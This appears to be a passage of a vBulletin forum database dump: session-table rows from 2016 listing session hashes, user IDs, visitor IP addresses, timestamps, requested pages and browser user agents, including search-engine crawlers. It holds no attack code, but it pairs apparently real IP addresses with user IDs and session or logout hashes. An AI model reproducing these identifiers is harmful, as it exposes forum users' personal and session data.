('38d85d070eb95fdf51fc449fbe3e3a43', 0, '86.252.116.2', '07a62b71aaa83fd46d8b6c330c688a58', 1466031712, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ce0b38d121c60a27124aed7fe894a35f', 0, '110.174.100.239', '1ef1450a1570b0b264355bfa3ea5e657', 1466115158, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9b640796113e35e11af7d46cc46dca6a', 0, '172.68.34.60', '37a60411c341250cf0113f4eba911963', 1470260759, '/member.php?u=29&langid=1', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('28687b1963355b2853ca1117a0be95fb', 0, '180.180.74.248', 'a39d4eaf9a45d61f41afb2fbb822b9a9', 1466040233, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb60c662b2f1a140d5e6c124d209f825', 135, '105.150.226.191', '4a837dbf806f75a58673dbf15b0d1d3c', 1466041138, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('927148b9bd941b08b9cc85f46e2fd76f', 0, '172.68.34.47', '8c2a58ed4130be298d50116da95b8cf5', 1467346196, '/archive/index.php/t-2392.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('5e5d286ccb0c1d96817a83c3ae22a38f', 0, '164.132.104.200', '2fa948ea0706ae07c36274c942bb3629', 1466044925, '/index.php', 'Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A328 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3a2413f0f42114fa4ddbd2ecbe30723a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466046535, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('0b6e40ba27b4f877ce4de9baf1aaba6d', 0, '82.120.166.68', '2e8f67643af4bda8a2ae8cf822a9e4e9', 1466047485, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e51e7b2875c5d668d68af1d2633bb3e0', 0, '192.241.158.214', '7bdcfac43a95325cc41228de8793c108', 1466048059, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 YaBrowser/1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6a15a1204c5d44517c8ec2da10b6cfe5', 0, '172.68.10.240', '0d137fde69ef3e83a05f7da72a5bc512', 1466055934, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('366cf3533fc5dd78fc8d4f5f68edbd20', 0, '5.79.68.161', 'a89027fa1d937239bccd3a11d68525d3', 1466049233, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('58b8fc66292d93bac262cd12b95b0cc0', 0, '5.101.65.175', '2833112cddc49c562403331c034aab86', 1466916290, '/login.php?do=login&do=login', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/50.0.2661.102', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('32723d302c44cc7f50257e696d993ccd', 0, '172.68.11.251', '0d137fde69ef3e83a05f7da72a5bc512', 1466055913, '/index.php/favico.ico', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('20759e9d2b31a2ee9a30db41768f76e3', 0, '172.68.10.197', '54fe18c99e79a2671eb7a5764ccbbb4c', 1471360885, '/archive/index.php/t-1831.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('c2c0121b28a4384b4629351b84d0142a', 0, '172.68.34.81', 'a938925ca9403f145c82d10ebc1ecbe1', 1470267934, '/showthread.php?p=2933', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1adbe8fb9e6fa87ae76759704acdc4b', 0, '121.97.73.50', 'd9038ea14ca70119e16f44c80e4fae58', 1466065076, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b4889d0f778d90f94d766663bb1f44c0', 0, '172.68.34.51', 'dce73380cf0fd3aff82da93d9252bb04', 1469623553, '/archive/index.php/f-37.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('69f35c2b3cc18aab7f99d0cf178336eb', 0, '172.68.34.58', 'a938925ca9403f145c82d10ebc1ecbe1', 1470295424, '/showthread.php?p=2036', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('95bb2fb5df57e0b2356207540f6b1c2d', 161, '54.233.145.152', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1466068757, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('c5ec97dcf1c6f056fa4a0abe46e6c8b5', 0, '178.162.196.87', '914a4e2f76e8c4913c360d5904e22086', 1466069603, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c800f67e97ba15b5ce5af579f0f5ddcf', 0, '105.158.11.89', '60a4371fac8f8d544a3a3ed4f7f90080', 1466071440, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8614ce029858b3d2582c3fb45eba8bff', 0, '80.249.216.98', 'ee7f6aa3a24374b7cec8e7edda6be8a4', 1466074529, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c2249673545e3696569e1047a908421a', 0, '172.68.34.57', 'a938925ca9403f145c82d10ebc1ecbe1', 1470283412, '/showthread.php?p=2247', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1977ae567228ae59b8305c343e71914d', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466080738, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('28ccf267c8dff1ecfac0d63ee83adafd', 0, '66.249.79.171', '42382f72607791905ff50694f07a1e96', 1466931301, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b87129ccec09c382cc0091818f27e78b', 0, '66.249.79.185', '42382f72607791905ff50694f07a1e96', 1470641733, '/misc.php?do=bbcode&langid=1', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('844e3f1e8155ea3d585f2bf2f9514ec4', 0, '66.249.79.178', '42382f72607791905ff50694f07a1e96', 1467426063, '/faq.php?faq=vb3_board_usage', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7005eed0c28e37e5be64acd1e31816e9', 0, '136.0.4.140', 'f30d5405909c72150d8412748310754d', 1466095852, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3cf466b673bbc74b535af05752f38b2f', 0, '150.135.210.211', 'f296f93089921b71d5ef76ffede9e464', 1466098871, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2063cf3ecdca1eebba271dc7d5c15c7e', 0, '66.249.79.150', '42382f72607791905ff50694f07a1e96', 1466948406, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8b1fbc099ff123c4c0944f618904f875', 0, '66.249.79.157', '42382f72607791905ff50694f07a1e96', 1466930213, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('30dbf0d6f335fa43367532d5bb8fb294', 0, '90.255.34.166', '5ed84ac50330cf3a99bd5cc0456480fd', 1466415982, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a676abe19d6588e99d5f3fd5ab0a51bb', 0, '91.33.97.28', '071764a2cbbe301c983fd71166742bae', 1466110229, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7a571d28d46ed9ab6db582e25c30db88', 0, '66.249.79.178', '1f427e4d6723ae757ae768f9466ee93a', 1466919205, '/member.php?u=11', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fd48f44c7cf20e4c31df61570c1c8825', 0, '207.244.70.35', '2c7a7e2cb8a3e5264ffdb9446d5a2587', 1466111684, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2ab3126db93349d96456ada89c95a6db', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466114995, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('68c5020e8073badb3959a0f75d2f3845', 0, '172.68.11.250', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475280684, '/member.php?u=39', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d5a84ea92fe5e91cab91eb378578e110', 0, '172.68.11.245', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475165494, '/search.php?searchthreadid=2346', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e55c32a702077fb2c98f3cdb123dd3e2', 0, '2001:4998:effd:', '65b6e2221bda6aad4fc252e7c5ccb842', 1466126607, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c8d06e10a263e75e5d83ecda444f3fc', 0, '218.17.116.199', '118ca1821ef3de04d2255990df3e5fa4', 1466502956, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8b93ab195a8819489c5cd38b41220279', 0, '2a02:598:a::78:', '1a995962d8d944b0e59853e3dc16fd4c', 1472576240, '/search.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('812706580f5271502a17ff9acd40ca1e', 0, '89.238.186.147', '634169dfada7b4d978d0f82203fbb5a2', 1466130418, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('207cc293052de93b327fd4ca44d73e83', 0, '118.69.224.201', '54cb8825075f1aa6d85baeea93c3a1a8', 1466136481, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('75915c567dc3a4d8660872a34950da66', 0, '128.199.57.215', 'd5d88e472e3e7b2ba2fd8ee5d21706c3', 1466138262, '/index.php', 'SafeDNSBot (https://www.safedns.com/searchbot)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('47326f68123ea35e3171912473439dc2', 0, '41.248.141.48', '42ba4b1a7389b5800764c96bf4bbefbd', 1466143492, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('334c3b7db915020e15392e306be2112b', 0, '172.68.10.204', '08df5b668f27ce0c54a0329f8d562ed6', 1466143569, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('436324d725b0d7c05f4abfa9c891a7ee', 0, '172.68.11.206', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1471833168, '/index.php', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a641a8354307e31e68c9f76de1765ec0', 0, '94.99.178.75', '5e4e8988d5f41c243e9aa948cce06bff', 1466147977, '/showthread.php?p=2688', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('37ea96d0918ed73748eec0fa0e3e3302', 0, '1.0.177.179', 'f7185ed189a0aa74dfb34d12c1b18178', 1466148050, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ac1f41ca38fb395e3d1bccded0bde8fc', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466150351, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2798583b1b6e8dedb10e737da5b4c70f', 0, '66.249.79.164', '1f427e4d6723ae757ae768f9466ee93a', 1466798601, '/showthread.php?p=2884', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb65bb3445a83ffc5cdfb9feca913daa', 0, '222.145.143.45', '6d38a294145efca672e56b6147ed516f', 1475322367, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ce489cbe382bb038760b4182b333f578', 0, '157.55.39.155', '23f3103f44bc3badcba53554e5e4cb6d', 1466349313, '/memberlist.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('203f9861dc2bf980b6eaa2e7e65649ba', 0, '207.46.13.118', '5e207e311e22cdc3b2095126a922fa93', 1466158175, '/search.php?do=getdaily', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('38cb2d013c91f073186c44062baa49a0', 0, '157.55.39.242', '23f3103f44bc3badcba53554e5e4cb6d', 1466158255, '/showthread.php?p=3046', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e1c90a678d6f7ac36fe3722e9735baaa', 0, '109.150.164.158', 'a70673295ed0bd72c4972f1e47fac311', 1466159945, '/index.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('456f1d1ec870a55a626ada296b575756', 161, '172.68.29.181', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1466166799, '/login.php?do=login', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7ed15cbaddeb6846e4a13fb4a6e5f72e', 0, '1.0.180.178', '5b3978e5b210b3074ec7d6659cc4c2c6', 1466167845, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ffaaa9dc91ea2393a926a5e944194d8', 0, '40.77.167.76', 'c5490a5a8e1813ac25cf9e19091dcb85', 1466169489, '/showthread.php?p=3017', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e8662e7c1e548a4eaa898a8bbdb2d694', 0, '40.77.167.4', 'c5490a5a8e1813ac25cf9e19091dcb85', 1466176086, '/archive/index.php/f-35.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('20369a469c53376d50cdbabbe008ca2e', 0, '157.55.39.64', '23f3103f44bc3badcba53554e5e4cb6d', 1466176123, '/misc.php?do=showsmilies', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3f0a218252293c1951c27990d77be2d2', 0, '185.22.173.203', 'f5ad81656a2d03aa65708308a50c3dad', 1466176722, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aaab55605a615020856e26b97479d050', 0, '197.231.221.211', 'cf6cf3083f3da6190915768d5c3e276a', 1466179178, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('53a2be60aea34a71f37e5b65d9a7bc74', 0, '46.101.219.214', 'c7a5cc6e91cf5e04ce986c4366de1122', 1466179509, '/login.php?do=logout&logouthash=1466179503-47d93bfa3877d84b6848b4b98d8e02ffe52877db', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.6.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b855b188aeba6ee3e7019901f4939566', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466186012, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d1b4d0063f593254fe96b6110bcb50df', 0, '51.255.169.52', '6e37b09dd9a32a8e674c88b3a2a0046e', 1466796255, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a58fa7a61cd7ee3da84d2533f8274493', 0, '156.208.41.204', 'df1b718c5ab801e226d2348e5751e227', 1466191703, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fece33af7c22e21a8b6e204042411692', 0, '77.66.159.101', '7086c18c038eb5229c5f007b2a364944', 1466192952, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1f45488921f1be5eb0180b5a063558fd', 0, '178.167.254.173', 'b0d4d58df8fae130646d5bb205205f62', 1466195172, '/member.php?u=33', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e745f64114309f0dacfa484b412f8a5', 0, '50.200.212.156', 'deacd98c34834086b6f0373d7c5eb2cd', 1466205241, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.26', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cefc80abd96f01e95e23c89376c4051a', 0, '192.180.71.161', '7c3e71963ec7dfaa7844373440d28112', 1466210153, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c08446230a5c2aa58e2438147c3325f', 0, '172.68.11.203', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470839970, '/showthread.php?t=1833', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('803da9c10911c8ab3f25fb5beab68b2c', 0, '5.147.32.23', 'fc214d2aed798c9829df8ce39493b5ff', 1466219432, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d4f8ed9acc62303ed58f74d488199540', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466222772, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('77e459af09b55f9a91336bab250bbcce', 0, '186.137.153.32', 'fa9d58b5330b93ae9acd9393bf4b2327', 1466225436, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('86fc031981849d3315b9d0ca8f1d438b', 0, '172.68.11.200', '0209957ca602f7e66fd34acefe6af861', 1466230495, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('44bedafa22f261be621fe5507c280e22', 0, '78.163.209.132', '67880885d8577dc6b4dbb44cd2c5b0d0', 1466230559, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('51fd6987a4a180a79faefbbd206c193e', 0, '46.165.201.42', '6e103bbd2fbab6eef6a7491ab7885a4d', 1466231379, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1fe9b2cd09b0e8c5d909781db74f9b4e', 0, '39.40.252.169', '7dfecd7c76bd8ce2c733bf71f2fae022', 1466235741, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('02c4e5ecd4ac8e604e5bb94e14318417', 0, '66.249.65.97', '2b2ff7461e581eb89ef4dc9afe8de380', 1466236623, '/member.php?u=388', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ca6423b5f573024af99208b21d12399', 0, '66.249.65.103', '2b2ff7461e581eb89ef4dc9afe8de380', 1467239212, '/showthread.php?t=2383', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c08dd4f28c5e955aa18986c327e3e198', 0, '66.249.65.100', '2b2ff7461e581eb89ef4dc9afe8de380', 1467517158, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2d9bd59191dd2f2cf5652effe30a74d4', 0, '49.206.218.34', '430ac25f034b2aab67a8b70aa7b0085e', 1466239825, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('08f6abac30ffee3a7cbcb9a509cf2e64', 0, '172.68.10.251', '1eef23d142e51b93eb22e01ee941c4bf', 1466246711, '/index.php/favicon.ico', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be5399220a77d12833f14a8e30ad91a1', 0, '172.68.10.198', '1eef23d142e51b93eb22e01ee941c4bf', 1466246737, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4c613a73bfeb9bda77d2504db7392cce', 0, '172.68.11.251', '1eef23d142e51b93eb22e01ee941c4bf', 1466246711, '/index.php/favico.ico', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c988ebd7b852cae7af24b856096b3f11', 0, '104.160.7.185', '1c6efbac56bbd4157f7008c52801a735', 1466254062, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('204aa819ab52a2db69e4b9d1b72bff59', 0, '79.13.231.59', '4bff253656e0f0ff038b9930507c4202', 1466257636, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('66541fe1af7e83d4b42572da1fb0adf8', 0, '92.241.200.150', '06445460978473de30238954bb03f1e5', 1466259583, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5f0e06e47c76a68e5391a2c60105901f', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1466259922, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6daf4c64713654e9a2d16244e2467b86', 0, '94.156.219.217', '0d195bdde037b11d84f25a9aebcc2d16', 1466261391, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('788fca1e6c1417ba9797fe2fa56134f1', 0, '190.123.39.27', '2b50c5b4c5c70d4bae6632ab7a7014b2', 1466262403, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
